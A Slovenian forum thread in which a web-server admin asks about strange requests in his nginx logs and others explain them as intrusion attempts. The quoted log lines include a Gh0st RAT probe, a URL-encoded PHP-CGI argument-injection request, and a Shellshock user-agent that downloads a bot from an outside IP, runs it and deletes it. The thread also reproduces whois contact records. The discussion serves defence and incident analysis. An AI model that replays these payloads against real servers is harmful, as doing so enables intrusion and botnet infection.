Forum » Programiranje » Kako narediti request z "\" v URL-ju
Kako narediti request z "\" v URL-ju
HotBurek ::
Pozdravljeni.
V log fajlih sem zasledil requeste sledeče oblike:
[27/Sep/2017:20:03:47 +0200] "\x00\x10\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10\x11\x12\x13\x14\x15\x16" 400 172 "-" "-"
Zanima me, kako bi lahko s kodo na client strani testiral takšne requeste (in blokiral source).
Če za url (v Pythonu, ne browserju) vnesem npr. tralala.com/\\x00, mi v logih izpiše /%5Cx00.
Če vnesem tralala.com/\x00, pa /%00.
Rad bi te URLje preizkusil in blokiral ta promet. Zanimivo tudi, da v logih za tak request ni zraven GET, HEAD ali česar podobnoega, ampak je kar prazno.
V log fajlih sem zasledil requeste sledeče oblike:
[27/Sep/2017:20:03:47 +0200] "\x00\x10\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10\x11\x12\x13\x14\x15\x16" 400 172 "-" "-"
Zanima me, kako bi lahko s kodo na client strani testiral takšne requeste (in blokiral source).
Če za url (v Pythonu, ne browserju) vnesem npr. tralala.com/\\x00, mi v logih izpiše /%5Cx00.
Če vnesem tralala.com/\x00, pa /%00.
Rad bi te URLje preizkusil in blokiral ta promet. Zanimivo tudi, da v logih za tak request ni zraven GET, HEAD ali česar podobnoega, ampak je kar prazno.
root@debian:/# iptraf-ng
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
avian2 ::
Nisi povedal, kateri strežnik uporabljaš. Pri Apache zapis "\x01" pomeni, da je bil v zahtevi byte z hex vrednostjo 01. Dejanski "\x01" v zahtevi bi se zapisal v log kot "\\x01".
V tvojem log zapisu ni "GET", "HEAD", itd. kjer je bil niz "\x00\x10\x00..." očitno interpretiran kot ime HTTP metode.
Tukaj je Python program, s katerim lahko eksperimentiraš s podobnimi zahtevami. Je pa vsaj pri Apache 2.4.10 tako, da NULL byte (\x00) v zahtevi prekine procesiranje, tako da konkretno tvoja zahteva (ki se začne z \x00) v log zapiše samo "".
V tvojem log zapisu ni "GET", "HEAD", itd. kjer je bil niz "\x00\x10\x00..." očitno interpretiran kot ime HTTP metode.
Tukaj je Python program, s katerim lahko eksperimentiraš s podobnimi zahtevami. Je pa vsaj pri Apache 2.4.10 tako, da NULL byte (\x00) v zahtevi prekine procesiranje, tako da konkretno tvoja zahteva (ki se začne z \x00) v log zapiše samo "".
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 80))
s.sendall(b'\x01\x02\x03\r\n')
s.close()
HotBurek ::
Hvala za sempl. Dela točno to, kar sem rabil. :)
S testom sem ugotovil, da web strežnik (nginx 1.6.2) že sam zavrne request (400 response) in requeste na posreduje naprej na Python skripto.
Sem mislil, da bi naredil trap za te requeste in blokiral tak promet, pa ne bo šlo. Edino preko log fajlov.
S testom sem ugotovil, da web strežnik (nginx 1.6.2) že sam zavrne request (400 response) in requeste na posreduje naprej na Python skripto.
Sem mislil, da bi naredil trap za te requeste in blokiral tak promet, pa ne bo šlo. Edino preko log fajlov.
root@debian:/# iptraf-ng
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
jype ::
Lahko imaš manj kunšten http strežnik, lahko ga izpelješ iz tistega v golang http knjižnici, če si Python človek pa kar iz BaseHTTPServer (ta sicer ne bo pretirano zmogljiv).
HotBurek ::
Config za nginx imam sledeč:
location / {
try_files /skripta.py =404;
include uwsgi_params;
uwsgi_modifier1 9;
uwsgi_pass 127.0.0.1:1234;
}
Pa sem računal, da bo ta \x00 šel naprej na skripto. Saj mogoče je bolje, da je tako.
Težko je gledat te requeste v logih, ker mi niso všeč. :)
66.240.205.34 - - [29/Sep/2017:16:53:27 +0200] "Gh0st\xAD\x00\x00\x00\xE0\x00\x00\x00x\x9CKS``\x98\xC3\xC0\xC0\xC0\x06\xC4\x8C@\xBCQ\x96\x81\x81\x09H\x07\xA7\x16\x95e&\xA7*\x04$&g+\x182\x94\xF6\xB000\xAC\xA8rc\x00\x01\x11\xA0\x82\x1F\x5C`&\x83\xC7K7\x86\x19\xE5n\x0C9\x95n\x0C;\x84\x0F3\xAC\xE8sch\xA8^\xCF4'J\x97\xA9\x82\xE30\xC3\x91h]&\x90\xF8\xCE\x97S\xCBA4L?2=\xE1\xC4\x92\x86\x0B@\xF5`\x0CT\x1F\xAE\xAF]" 400 172 "-" "-"
location / {
try_files /skripta.py =404;
include uwsgi_params;
uwsgi_modifier1 9;
uwsgi_pass 127.0.0.1:1234;
}
Pa sem računal, da bo ta \x00 šel naprej na skripto. Saj mogoče je bolje, da je tako.
Težko je gledat te requeste v logih, ker mi niso všeč. :)
66.240.205.34 - - [29/Sep/2017:16:53:27 +0200] "Gh0st\xAD\x00\x00\x00\xE0\x00\x00\x00x\x9CKS``\x98\xC3\xC0\xC0\xC0\x06\xC4\x8C@\xBCQ\x96\x81\x81\x09H\x07\xA7\x16\x95e&\xA7*\x04$&g+\x182\x94\xF6\xB000\xAC\xA8rc\x00\x01\x11\xA0\x82\x1F\x5C`&\x83\xC7K7\x86\x19\xE5n\x0C9\x95n\x0C;\x84\x0F3\xAC\xE8sch\xA8^\xCF4'J\x97\xA9\x82\xE30\xC3\x91h]&\x90\xF8\xCE\x97S\xCBA4L?2=\xE1\xC4\x92\x86\x0B@\xF5`\x0CT\x1F\xAE\xAF]" 400 172 "-" "-"
root@debian:/# iptraf-ng
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
jype ::
Dolgo je, kar sem nazadnje bral nginx source, a se spominjam kode, ki se odloča, kako obravnavati http zahtevek, ki že zelo zgodaj na začetku vrne 400, če so reči očitno neveljavne - pa tudi nobene zastavice se ne spominjam, da bi lahko strežnik prosil, da ignorira taka opažanja.
Skratka, če hočeš početi "čudne reči" s http, potem potrebuješ strežnik, ki ti dovoli večji nadzor nad obravnavo zahtevkov.
Skratka, če hočeš početi "čudne reči" s http, potem potrebuješ strežnik, ki ti dovoli večji nadzor nad obravnavo zahtevkov.
SeMiNeSanja ::
WatchGuard požarne pregrade s svojim http proxijem znajo zavrniti takšne in drugačne 'neobičajne' zahteve (seveda si moraš tak filter nastaviti).
S čem drugim bi to lahko blokiral, pa nebi vedel (nginx bi znal biti kandidat, vendar....). Večina požarnih pregrad ti ne pusti takih globokih posegov v promet. Morda pa je še kakšna izjema tam zunaj. Ampak po Murphy-ju, si tisto gotovo ne lastiš.
Če pa se gre zgolj za moteč 'prikaz', pa z malo regexp-a narediš text filter, ki ti takšne vrstice pomeče ven iz log datoteke. Vsaj na Linuxu je to mačji kašelj.
S čem drugim bi to lahko blokiral, pa nebi vedel (nginx bi znal biti kandidat, vendar....). Večina požarnih pregrad ti ne pusti takih globokih posegov v promet. Morda pa je še kakšna izjema tam zunaj. Ampak po Murphy-ju, si tisto gotovo ne lastiš.
Če pa se gre zgolj za moteč 'prikaz', pa z malo regexp-a narediš text filter, ki ti takšne vrstice pomeče ven iz log datoteke. Vsaj na Linuxu je to mačji kašelj.
RC37 ::
Pazi pri programiranju URLjev ker obstajajo ANSI escape sekvence (to je tisti, ko pise \ in zraven neka stevilka/crka, da je text npr. rdece barve). Vem, da eni jeziki (c++) komplicirajo tudi ce je npr. sredi narekovajev kot nekaj, kar se izpise uporabniku.
HotBurek ::
Danes pa drug tip requesta:
117.78.15.5 - - [30/Sep/2017:18:30:01 +0200] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65
%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D
%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69
%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65
%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 184 "-" "-"
Kako bi lahko takšne requeste stestiral z zgornjo Python kodo? Če vnesem ta string v s.sendall(x), server prikaže 400.
A so takšni requesti sploh nevarni? (nginx)
117.78.15.5 - - [30/Sep/2017:18:30:01 +0200] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65
%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D
%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69
%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65
%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 184 "-" "-"
Kako bi lahko takšne requeste stestiral z zgornjo Python kodo? Če vnesem ta string v s.sendall(x), server prikaže 400.
A so takšni requesti sploh nevarni? (nginx)
root@debian:/# iptraf-ng
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
Horejšio ::
HTTP 400 je ok. Zavrne strežnik. Zgleda mi pa kot poskus vdora. Nima veze skripta. HTTP server naj bo zadnje verzije. V logu imaš tudi IP mojstra, pa ga lahko blokiraš z iptables npr.
Horejšio ::
Results for 117.78.15.5 :
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to '117.78.0.0 - 117.78.63.255'
% Abuse contact for '117.78.0.0 - 117.78.63.255' is 'ipas@cnnic.cn'
inetnum: 117.78.0.0 - 117.78.63.255
netname: HWCSNET
country: CN
descr: Huawei Public Cloud Service (Huawei Software Technologies Ltd.Co)
descr: No.2018 Xuegang Road,Bantian street,Longgang District,
descr: Shenzhen,Guangdong Province, 518129 P.R.China
admin-c: QL1346-AP
admin-c: GQ305-AP
tech-c: HC1956-AP
tech-c: XW3200-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
changed: hm-changed@apnic.net 20121129
source: APNIC
irt: IRT-CNNIC-CN
address: Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox: ipas@cnnic.cn
admin-c: IP50-AP
tech-c: IP50-AP
auth: # Filtered
remarks: Please note that CNNIC is not an ISP and is not
remarks: empowered to investigate complaints of network abuse.
remarks: Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
changed: ipas@cnnic.cn 20110428
source: APNIC
person: Guifang Qiu
nic-hdl: GQ305-AP
e-mail: hwclouds.cs@huawei.com
address: No.3 Information Road, Shangdi
address: Haidian District,Beijing,100140 P.R.China
phone: +86-18618124392
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: Houyou Chen
nic-hdl: HC1956-AP
e-mail: hws_security@huawei.com
address: No.3 Information Road, Shangdi
address: Haidian District,Beijing,100140 P.R.China
phone: +86-18127092993
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: Quansheng Liu
nic-hdl: QL1346-AP
e-mail: hws_security@huawei.com
address: No.2018 Xuegang Road,Bantian street,Longgang District
address: Shenzhen,Guangdong Province, 518129 P.R.China
phone: +86-18988786266
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: Xiaolin Wei
nic-hdl: XW3200-AP
e-mail: hwclouds.cs@huawei.com
address: No.2018 Xuegang Road,Bantian street,Longgang District,
address: Shenzhen,Guangdong Province, 518129 P.R.China
phone: +86-13650985705
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
% Information related to '117.78.0.0/17AS4837'
route: 117.78.0.0/17
descr: CNC Group CHINA169 Sichuan Province Network
descr: Addresses from CNNIC(TimeNet)
country: CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
changed: abuse@cnc-noc.net 20070929
source: APNIC
% This query was served by the APNIC Whois Service version 1.88.15-37 (WHOIS-UK4)
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to '117.78.0.0 - 117.78.63.255'
% Abuse contact for '117.78.0.0 - 117.78.63.255' is 'ipas@cnnic.cn'
inetnum: 117.78.0.0 - 117.78.63.255
netname: HWCSNET
country: CN
descr: Huawei Public Cloud Service (Huawei Software Technologies Ltd.Co)
descr: No.2018 Xuegang Road,Bantian street,Longgang District,
descr: Shenzhen,Guangdong Province, 518129 P.R.China
admin-c: QL1346-AP
admin-c: GQ305-AP
tech-c: HC1956-AP
tech-c: XW3200-AP
status: ALLOCATED PORTABLE
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
changed: hm-changed@apnic.net 20121129
source: APNIC
irt: IRT-CNNIC-CN
address: Beijing, China
e-mail: ipas@cnnic.cn
abuse-mailbox: ipas@cnnic.cn
admin-c: IP50-AP
tech-c: IP50-AP
auth: # Filtered
remarks: Please note that CNNIC is not an ISP and is not
remarks: empowered to investigate complaints of network abuse.
remarks: Please contact the tech-c or admin-c of the network.
mnt-by: MAINT-CNNIC-AP
changed: ipas@cnnic.cn 20110428
source: APNIC
person: Guifang Qiu
nic-hdl: GQ305-AP
e-mail: hwclouds.cs@huawei.com
address: No.3 Information Road, Shangdi
address: Haidian District,Beijing,100140 P.R.China
phone: +86-18618124392
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: Houyou Chen
nic-hdl: HC1956-AP
e-mail: hws_security@huawei.com
address: No.3 Information Road, Shangdi
address: Haidian District,Beijing,100140 P.R.China
phone: +86-18127092993
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: Quansheng Liu
nic-hdl: QL1346-AP
e-mail: hws_security@huawei.com
address: No.2018 Xuegang Road,Bantian street,Longgang District
address: Shenzhen,Guangdong Province, 518129 P.R.China
phone: +86-18988786266
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
person: Xiaolin Wei
nic-hdl: XW3200-AP
e-mail: hwclouds.cs@huawei.com
address: No.2018 Xuegang Road,Bantian street,Longgang District,
address: Shenzhen,Guangdong Province, 518129 P.R.China
phone: +86-13650985705
country: CN
changed: ipas@cnnic.net.cn 20170307
mnt-by: MAINT-CNNIC-AP
source: APNIC
% Information related to '117.78.0.0/17AS4837'
route: 117.78.0.0/17
descr: CNC Group CHINA169 Sichuan Province Network
descr: Addresses from CNNIC(TimeNet)
country: CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR
changed: abuse@cnc-noc.net 20070929
source: APNIC
% This query was served by the APNIC Whois Service version 1.88.15-37 (WHOIS-UK4)
HotBurek ::
Nov teden, nov request :)
94.180.115.102 - - [01/Oct/2017:14:35:19 +0200] "GET / HTTP/1.0" 301 184 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/log http://179.185.16.20/log;/usr/bin/wget http://179.185.16.20/log -O /tmp/log;wget http://179.185.16.20/log -O /dev/shm/log;chmod +x /dev/shm/log /tmp/log;/dev/shm/log;/tmp/log;rm -rf /dev/shm/log /tmp/log*\x22"
Tale je v user agenta vnesel neke ukaze. Source je RU, 179 IP pa v BR.
Zna kdo dešifrirat log fajl at http://179.185.16.20/log ?
94.180.115.102 - - [01/Oct/2017:14:35:19 +0200] "GET / HTTP/1.0" 301 184 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/log http://179.185.16.20/log;/usr/bin/wget http://179.185.16.20/log -O /tmp/log;wget http://179.185.16.20/log -O /dev/shm/log;chmod +x /dev/shm/log /tmp/log;/dev/shm/log;/tmp/log;rm -rf /dev/shm/log /tmp/log*\x22"
Tale je v user agenta vnesel neke ukaze. Source je RU, 179 IP pa v BR.
Zna kdo dešifrirat log fajl at http://179.185.16.20/log ?
root@debian:/# iptraf-ng
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
Zgodovina sprememb…
- spremenilo: HotBurek ()
misek ::
Zna kdo dešifrirat log fajl at http://179.185.16.20/log ?Je to IRC server za remote dostop?
HotBurek ::
V hederju ima napisano DDoS Perl IrcBot v1.0 / 2017 by flood.ro Team
Zgleda nadaljevanje tega https://gist.github.com/tlongren/afe816...
Zgleda nadaljevanje tega https://gist.github.com/tlongren/afe816...
root@debian:/# iptraf-ng
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window
Horejšio ::
Lahko opozoriš ponudnika NET storitve za napad.
Zgodovina sprememb…
- spremenilo: Horejšio ()
Horejšio ::
Nov teden, nov request :)
94.180.115.102 - - [01/Oct/2017:14:35:19 +0200] "GET / HTTP/1.0" 301 184 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/log http://179.185.16.20/log;/usr/bin/wget http://179.185.16.20/log -O /tmp/log;wget http://179.185.16.20/log -O /dev/shm/log;chmod +x /dev/shm/log /tmp/log;/dev/shm/log;/tmp/log;rm -rf /dev/shm/log /tmp/log*\x22"
Shellshock %28software bug%29 @ Wikipedia
LP
Tale je v user agenta vnesel neke ukaze. Source je RU, 179 IP pa v BR.
Zna kdo dešifrirat log fajl at http://179.185.16.20/log ?
Ta zadnji je pa test shellshock-a "/bin/bash -c \x22curl .."
Over & out. Exit 0;
Zgodovina sprememb…
- spremenilo: Horejšio ()
Horejšio ::
Če imate npr. RDP odprt v internet, je to res super tarča. Port 3389 je verjetno med hekerji najbolj priljubljen na win. Nujno na firewall omejit dostope do porta. Na Win se ne spoznam najbolj, mogoče je tole ok nasvet: http://searchsecurity.techtarget.com/ti...
Zgodovina sprememb…
- spremenilo: Horejšio ()
Vredno ogleda ...
| Tema | Ogledi | Zadnje sporočilo | |
|---|---|---|---|
| Tema | Ogledi | Zadnje sporočilo | |
| » | Pobegla baza z osebnimi in finančnimi podatki več kot polovice ameriških gospodinjsteOddelek: Novice / Zasebnost | 8271 (5913) | MrStein |
| » | Win32 napaka, virus | Generic Host Process for Win32Oddelek: Pomoč in nasveti | 5516 (3538) | Caniggia |
| » | LG GSA-4120B dela probleme pri pečenju DL DVD+RjevOddelek: Strojna oprema | 1619 (1428) | mtosev |
| » | poskusi vdora al kajOddelek: Omrežja in internet | 2035 (1643) | tris |
| » | Port scan...wtf?!?!Oddelek: Omrežja in internet | 2139 (1904) | flipflop |